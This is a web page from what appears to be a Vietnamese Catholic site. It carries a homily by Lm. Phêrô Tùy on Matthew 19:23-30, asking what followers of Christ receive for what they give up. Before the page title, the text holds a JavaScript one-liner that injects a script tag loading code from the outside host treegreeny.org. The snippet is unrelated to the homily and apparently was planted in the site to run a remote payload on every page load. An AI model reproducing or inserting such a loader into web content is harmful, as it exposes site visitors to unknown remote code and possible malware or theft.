;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Theo Chúa Được Gì? – Xitô PS

Theo Chúa Được Gì?

Suy niệm Tin Mừng thứ 3 tuần XX thường niên: Mt 19, 23-30


Theo Chúa phải bỏ biết bao nhiêu thứ vui, phải vác biết bao cái khổ, cái hạn… mà không được kêu, phải cho mà không được tính toán, vậy chúng ta sẽ được gì?
Câu hỏi xem ra rất vô duyên, thực tế lại rất duyên và cũng rất thật, vì nó phản ánh thật tâm trạng, khát vọng khó nói của tất cả mọi người ở mọi thời đại, đặc biệt của những ai muốn theo sát Chúa Kitô như các môn đệ và mỗi chúng ta hôm nay. Trước câu hỏi như đùa như thật của các môn đệ, Chúa Giê su không trách các ông mà còn hứa ban nhiều phần thưởng cho những ai muốn theo Ngài, phần phúc ấy là gì? Đó là: “Trong thời tái sinh, khi Con Người ngự tòa vinh hiển, anh em cũng sẽ được ngự trên mười hai tòa mà xét xử mười hai chi tộc Israel”. Được tái sinh là phúc lớn. Thực chất, phúc này không chỉ bó buộc “trong thời tái sinh”, ngay khi ta lãnh nhận bí tích Rửa tội, Đức Kitô không ngừng tái sinh, tái tạo chúng ta “nên đồng hình đồng dạng với Ngài” trong yêu thương và phục vụ, trong tha thứ và hợp nhất.
Được sự sống vĩnh cửu làm gia nghiệp: Sự sống đời đời là khát vọng sâu xa và căn cốt nhất của con người mọi thời đại, người ta chỉ có được là nhờ tin vào Chúa Kitô. Sự sống vĩnh cửu chính là quà tặng tuyệt vời Chúa Kitô ban cho những ai đi theo Người. Quà tặng được cho không nhưng không thể nhận không, mà cần phải có lòng ước muốn và nếu cần phải đánh đổi tất cả vì Danh Đức Kitô để nhận được món quà sự sống. “Phàm ai bỏ nhà cửa, anh em, chị em, cha mẹ, con cái hay ruộng đất, vì danh Thày thì sẽ được gấp bội và còn được sự sống vĩnh cửu làm gia nghiệp”. Một bậc thang giá trị được đặt ra không phải loại trừ hay phủ nhận những mối liên hệ ruột thịt máu mủ với cha mẹ, anh chị em và con cái, nhưng Thiên Chúa thì trên thụ tạo, thiêng liêng thì hơn vật chất. Khi đặt đúng bậc thang giá trị, mối liên hệ huyết thống sẽ được tháp nối trong mối liên hệ thiêng liêng trong Thần Khí và nó sẽ trở lên bất tử trong Thiên Chúa.
Đó là phần phúc cho những ai từ bỏ mọi sự mà theo Đức Ki tô. Để kiếm chứng, chúng ta thử ngó lại xem, mình đã xứng để nhận những thành quả đó chưa? Ngó lại mình để thấy theo Chúa thì vẫn theo, nhưng nói bỏ nhiều mà sao lòng vẫn lặng, bị vẫn đầy; Nói vác giới hạn và khuyết điểm bản thân mà sao vẫn than nặng; Nói “cho không tính toán” mà sao lòng vẫn đắn đó hơn thiệt. Như thế, ngó lại mình để thấy mình là người chứ không phải là thần, vào được Nước trời, đạt được sự sống đời đời là ân huệ chứ không phải tài trí của con người. Quả đúng như Đức Giêsu đã nói: đối với loài người thì không thể nhưng đối với Thiên Chúa mọi sự đều có thể được. Bởi vậy để đạt đươc phần phúc đời đời trong thời tái sinh và ngay trong hiện tại chúng ta phải dám đánh đổi tất cả vì Chúa Kitô.
Có lẽ tới đây, việc chúng ta cần làm đó là đấm ngực xin lỗi Đức Kitô, bởi đã rất nhiều lần chúng ta đã gặn hỏi theo Chúa chúng con sẽ được gì, nhưng lòng ta lại chưa muốn nhận những gì Ngài ban, mà chỉ đòi những thứ ta muốn để mà vui theo bản năng. Đó là những khuyết điểm cần phải bỏ và phải sửa mình để kiên trung trong ơn gọi, và để nhận những phần phúc, những ân huệ chứ không kẻo nỡ ngay cái đang có cũng sẽ bị lấy đi, đang đứng hàng đầu lại bị đẩy xuống chót, đang đồng bàn trong hàng con cái lại bị đẩy xuống hàng tôi đòi ăn những mảnh vụn từ bàn rơi xuống.
Chúng ta cầu nguyện cho nhau, nâng đỡ nhau, giúp nhau kiên trung vượt qua những thách đố trong đời sống để đáng nhận quả phúc đời đời trong nước Chúa.

Lm. Phêrô Tùy

You May Also Like

Trả lời

X